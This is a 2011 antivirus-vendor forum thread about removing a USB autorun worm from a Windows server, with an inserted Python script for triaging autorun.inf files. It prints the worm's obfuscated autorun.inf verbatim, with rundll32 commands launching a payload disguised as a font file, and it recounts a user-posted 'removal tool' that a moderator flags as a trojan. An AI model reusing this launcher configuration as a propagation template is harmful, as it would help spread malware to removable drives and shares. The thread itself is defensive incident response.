Endpoint Protection


Need help removing WORM_OTORUN.ASH from server

  • 1.  Need help removing WORM_OTORUN.ASH from server

    Posted Apr 14, 2011 08:49 PM

    Running SEP version 11.0.6100.645

    I was working on a server tonight (Windows Server 2008 R2), and I came across two files called "myporno.avi" and "pornmovs".  A little digging brought up two additional files in the same location, named autorun.inf and setup161.fon.

    A bit of Googling turned up information that this is the Worm_Otorun.ash worm.  I checked SEP, and it is running and has the latest virus definitions (Thursday, April 14, 2011 r2).  Ran a full scan, but Symantec doesn't return any results.  I see that Trend Labs has a blog post in reference to this worm, but offers no help on getting rid of it besides pushing their own products.  I also tried a custom scan and configured Symantec to examine FON files, but it still finished the search and said it found no threats. 

    Has anyone else dealt with this worm lately?  If so, what steps did you take to identify the source, stop the spread, and eliminate it once and for all since Symantec doesn't seem to even detect this problem?  Thanks for your time, and please let me know if I can provide any more information.



  • 2.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 14, 2011 09:00 PM

    Can you get a copy of the autorun.inf so you can view it in a text editor? It should have a filename on it that runs the malware. The .fon file is for a font although it might contain malware. Check if there are unusual running processes. Avi files are known to contain code. So this may be a new one. You may want to check if there are changes in the registry. HKLM\Software\Microsoft\Windows\CurrentVer\Run. Look for suspicious files/processes being loaded.

    And send those files to Symantec for analysis.

    http://www.symantec.com/business/security_response/submitsamples.jsp



  • 3.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 14, 2011 09:12 PM

    My mistake.  It's actually "myporno.avi.lnk" and "pornmovs.lnk".  Forgot that I had file extensions hidden in the folders.  The target of both of these shortcuts points to the following path:

    C:\WINDOWS\system32\rundll32.exe setup161.fon,23ac91

    Here are the contents of the autorun.inf file.

    [otywvfmdtlpowgsx]
    gfrhifhylpmyrhgjhculpr=nlrukihekvqlaecjhfuuuihlny
    [iwvtulum]
    ragpduepbaclycogyfqlodmhqcfsistyljcd=bfwynxoehayshctali
    [oickavvapvtmxonwnuciwfthfitityvmyumf]
    fkbdwvxmcxjgmeklnrhmxqvqnelesoerxlyr=scvayljifd
    [bpwbrielubwfryqxkivjidavypisagfon]
    qxqygvla=juyfyxvceqvrkorneelyagedjpgcv
    [AutOruN]
    actIon=opEN
    pcvsuxpmmfpayamjlgtsygwecyhqxirit=kypflrxqmjveosdnyslosohlrrppxe
    iCon=%WIndiR%\SysTEm32\sheLl32.DLl,4
    hxiqctsitweelhaulvqgndvifmkufcu=vehpkdvsxcdqrfkvwtesfmhncpepypjayjxbcq
    UsEAutOPLAy=1
    kv=pcoqisfkwtggatcucwclfunglhddupd
    opeN=rUNDll32.eXE SETup161.FoN,23Acd0
    snqonahexwlcisrppge=edxxemytnqkumjjaskgvgroqdqgfyepkmgaajd
    sHEll\eXPloRE\CoMmaND=ruNdLL32.exE seTUp161.foN,23ACd0
    tpavwhdmcvupfovpebgukkcbolal=xv
    shell\OpEN\comMANd=RUnDLL32.exE SetUp161.fon,23acD0
    hxtfssxdyvpjuwnefvediwyddye=ivjdroolbdb

    Going to check now to see if any suspicious processes are running.
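Added example, not from the thread: a small Python triage script for an autorun.inf like the one posted above. It parses the file case-insensitively (the random letter case and junk sections are only padding), pulls out the commands Windows would run via open= and shell\<verb>\command=, and flags rundll32 loading a module whose extension is not .dll. The sample is the posted file abridged; KNOWN_KEYS is my own list of documented [autorun] keys.

```python
# Sample input: the autorun.inf posted in this thread, abridged (one of its four junk
# sections, three of the junk keys). Mixed case and junk entries are the worm's padding.
SAMPLE_AUTORUN_INF = r"""[otywvfmdtlpowgsx]
gfrhifhylpmyrhgjhculpr=nlrukihekvqlaecjhfuuuihlny
[AutOruN]
actIon=opEN
pcvsuxpmmfpayamjlgtsygwecyhqxirit=kypflrxqmjveosdnyslosohlrrppxe
iCon=%WIndiR%\SysTEm32\sheLl32.DLl,4
UsEAutOPLAy=1
kv=pcoqisfkwtggatcucwclfunglhddupd
opeN=rUNDll32.eXE SETup161.FoN,23Acd0
sHEll\eXPloRE\CoMmaND=ruNdLL32.exE seTUp161.foN,23ACd0
shell\OpEN\comMANd=RUnDLL32.exE SetUp161.fon,23acD0
hxtfssxdyvpjuwnefvediwyddye=ivjdroolbdb"""

# Documented [autorun] keys (assumed list); anything else besides shell\<verb>\command is padding.
KNOWN_KEYS = {"action", "icon", "label", "open", "shellexecute", "useautoplay"}

def parse_autorun(text):
    """Case-insensitive INI parse -> {section: {key: value}}; names are lower-cased."""
    sections, cur = {}, None
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            cur = sections.setdefault(line[1:-1].lower(), {})
        elif cur is not None and "=" in line:
            key, _, value = line.partition("=")
            cur[key.strip().lower()] = value.strip()
    return sections

def triage_autorun(text):
    """Report what the file launches on mount/double-click and how padded it is."""
    sections = parse_autorun(text)
    auto = sections.get("autorun", {})
    launch = {k: v for k, v in auto.items() if k in ("open", "shellexecute") or k.endswith("\\command")}
    # rundll32 is meant to load a .dll; any other extension (setup161.fon here) is a DLL
    # payload under a misleading name, so the module name itself is worth flagging.
    disguised = set()
    for cmd in launch.values():
        exe, _, args = cmd.lower().partition(" ")
        if exe in ("rundll32.exe", "rundll32") and args:
            module = args.split(",")[0].strip()
            if not module.endswith(".dll"):
                disguised.add(module)
    return {
        "launch_commands": launch,
        "disguised_rundll32_modules": sorted(disguised),
        "use_autoplay": auto.get("useautoplay") == "1",
        "junk_sections": [s for s in sections if s != "autorun"],
        "junk_keys": sorted(k for k in auto if k not in KNOWN_KEYS and not k.startswith("shell\\")),
    }
```

Run triage_autorun(SAMPLE_AUTORUN_INF) to see the three launch commands all resolve to the same renamed module, with UseAutoPlay forced on.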



  • 4.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 14, 2011 09:18 PM

    Your best bet is to disable Autorun/Autoplay first to kill the propagation vehicle.

    Then submit the setup*.fon file along with the *.LNK and Autorun file [zip all of them] to the link that mon_raralio advised.

    This is possibly a new variant of W32.SillyFDC.BDP
    http://www.symantec.com/security_response/writeup.jsp?docid=2011-031106-4835-99



  • 5.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 14, 2011 09:28 PM

    Hi.

    Locate this file: SetUp161.fon

    Remove it from the system. Give it to Symantec. :D

    And disable autorun on all accounts for this server. The inf file, if accidentally loaded, would re-enable that option on the affected PC.



  • 6.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 15, 2011 03:36 AM

    You should also look into this:

    http://www.microsoft.com/technet/security/advisory/967940.mspx

    "Microsoft is announcing the availability of updates to the Autorun feature that help to restrict AutoPlay functionality to only CD and DVD media on supported editions of Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. Restricting AutoPlay functionality to only CD and DVD media can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a USB flash drive, network shares, or other non-CD and non-DVD media containing a file system with an Autorun.inf file."



  • 7.  RE: Need help removing WORM_OTORUN.ASH from server

    Trusted Advisor
    Posted Apr 15, 2011 01:23 PM

    Hello,

    Please follow this article and submit these files to the Symantec Security Response:

    Using Symantec Support Tool, how do we Collect the Suspicious Files and Submit the same to Symantec Security Response Team.

    Hope that helps.


  • 8.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 19, 2011 10:09 PM

    I have made a removal tool for this virus. Did it in PHP CLI considering I don't know C++ that well and got hit pretty hard by it at work. All you have to do is extract and run the "run.bat" and let it get to work. If you want to enable scanning for MD5 of the virus, edit the settings.ini and change md5 to =1; this will find any traces that may be left behind but will cause it to take much longer.

    <edit by Cycletech, link was malicious > http://safeweb.norton.com/report/show?url=http%3A%2F%2Fbluephoenixcs.com

    Attached: Removal tool.zip



  • 9.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 20, 2011 04:47 PM

    Warning: If anyone clicked the original link in the above post, or downloaded the tool, I recommend deleting the file and running a full scan ASAP.

    Thomas (Cycletech)

    Update: After further investigation, the removal tool was in fact a trojan threat.

    http://www.symantec.com/security_response/writeup.jsp?docid=2005-072717-0748-99



  • 10.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 22, 2011 04:56 AM

    Hi mbenner,

    Just judging by the names of the files, that does sound like W32.SillyFDC.BDP.  See http://www.symantec.com/security_response/writeup.jsp?docid=2011-031106-4835-99 for details on this threat.  Definitions have been updated against new variants over the past few days, so definitely make sure you are running the latest defs when you perform a scan.

    The following .pdf contains many good recommendations, including a section on autoplay.  Worth reading! "Containing An Outbreak: How to clean your network after an incident"  http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/containing_an_outbreak.pdf

    Thanks and best regards,

    Mick



  • 11.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 22, 2011 06:21 PM

    You are right about my website, my host was attacked about 6 months ago but was taken care of within 24 hours of me noticing the problem. If you really want to say my removal tool was a virus you really need to check the facts before you say that. Check the MD5 of the php.exe; it is a legit file along with all the dll files. As for the .bat, it was probably detected because it shuts down core processes that are needed to run the computer that the worm hooks to. Not only that, you can view the source code of the entire tool in the .bat and .php file. I was trying to help out and yet you try to make me look like a complete….. If you want the link for further inspection I will be happy to email it to you or someone that really knows what they are looking at. With saying this, how do I get Symantec to rescan my site? The threats have been removed and taken care of, so they are showing false information on my site.



  • 12.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 25, 2011 10:43 AM

    @ thford89,

    I am here to protect our users. If you had someone post a link in your site that was proved malicious, and they also provided a tool that when scanned shows as a Trojan, I think you would do the same thing.

    In today's threat landscape, you need to be very careful when downloading free tools and apps, especially when these are being supplied by a new unknown user like yourself.

    https://www-secure.symantec.com/connect/user/thford89

    For step by step instructions on requesting a re-evaluation of your web site, visit our site owner introduction.

    http://safeweb.norton.com/report/show?url=bluephoenixcs.com

    Thomas



  • 13.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 25, 2011 11:37 PM

    I fully understand where you are coming from, but at that point I would investigate the tool and the site. Symantec is providing false information on my site and will not remove it unless I appeal it, which to me should be illegal. I know how often Symantec scans the site, and if the files are no longer there the files should no longer be shown on the Symantec site. Webservers are attacked just like any other computer.  The removal tool came up as a false positive, just like most of the things that come up when you scan with any type of Symantec tools. If it really wants to say the removal tool was a virus, you are saying 95% of the Linux webservers are viruses and 75% of Windows based web servers are a virus. PHP is used all over the web as a dynamic scripting language. The .bat file did nothing more than link to the php.exe and tell it which php file to execute, along with using regedit to remove the infected registry values. Again, if anyone who knows what they are doing wants to verify that my removal tool is not a virus and see I am trying to help people out, considering big companies will not release anything that will do it, email me or post on here and I will send the link.



  • 14.  RE: Need help removing WORM_OTORUN.ASH from server

    Posted Apr 26, 2011 10:50 AM

    BTW, The removal tool was tagged as a Trojan by scans run from Virus Total, not Symantec.

    Understand that I have a process that I must follow.

    You can submit the tool for analysis to the Security Response team here - http://www.symantec.com/business/security_response/submitsamples.jsp

    Send me the tracking number, once this file shows clean, I will repost here.

    Please contact the Safe Web Team to get your site reclassified as Safe.


    Best,

    Thomas